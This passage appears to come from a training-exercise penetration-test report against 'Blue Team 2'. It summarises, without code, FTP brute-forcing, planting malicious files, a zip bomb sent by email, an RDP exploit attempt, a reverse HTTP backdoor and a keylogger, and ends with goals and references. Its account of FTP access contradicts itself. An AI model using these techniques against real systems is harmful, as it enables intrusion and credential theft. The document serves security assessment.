The results provided us with a listing of specific services to target for this assessment. An attack
revealed the credentials of the FTP server. After a few trials we were not able to gain access to
this server by uncovering the password via brute-force by Hydra. Another try was to prove its
vulnerability from buffer overflow.
After obtaining the access to the FTP server, it was kept and we added malicious files inside it
that would cause the crash of system leading to data corruption.
Also, we created a malicious file and a Zipbomb in order to send it via e-Mail (target was SMTP
Server) using social engineering. At the moment, that the employee inside the ‘Company’ clicks
the files which have legit and realistic names, it brings application crashing and denial of service
to the legitimate users.
After a closer examination, we discovered that RDP service of the target system is vulnerable to
remote code execution with the flow of crafted RDP packets, so after exploitation the RDP
service was disrupted for some seconds or this may be a false positive alarm.
A successful exploitation consisted into creating a persistent backdoor with reverse HTTP, which
could get the shell access of the target at the moment that the user clicks it (what may bring the
user to the click is social engineering).
Privilege Escalation through windows flaws made possible to us to install a keylogger in the
Blue Team 2 client PC. After successfully install, we were able to catch all inputted passwords
and therefore we gained access to all their infrastructure.

Blue Team 2 suffered a series of control failures, which led to a potential compromise of
sensitive system assets.
These failures would have had a dramatic effect on the services that this ‘Company’ offers if a
malicious party had exploited them.
FTP and Web service were vulnerable to MITM attack, also the creation of backdoor which
cannot be detected from the antivirus,
The specific goals of the penetration test were stated as:
- Identifying if a remote attacker could penetrate the Blue Team 2 firewall
- Determining the impact of a security breach on:

62
 - Confidentiality of the company’s information
- Availability of Blue Team 2 information systems
These goals of the penetration test were met. A targeted attack against Blue Team 2 can result in
a potential compromise of organizational assets.

63
Appendix A
References
[1] https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
[2] https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/

[3] http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
[4] http://securitytools.wikidot.com/fuzzing
[5] https://www.infigo.hr/files/infigo-td-2006-04-01-fuzzing-eng.pdf
[6] https://securityaffairs.co/wordpress/22294/cyber-crime/thousands-ftp-servers-infected.html
[7] https://www.acunetix.com/vulnerabilities/
[8] https://www.tenable.com/plugins/nessus

64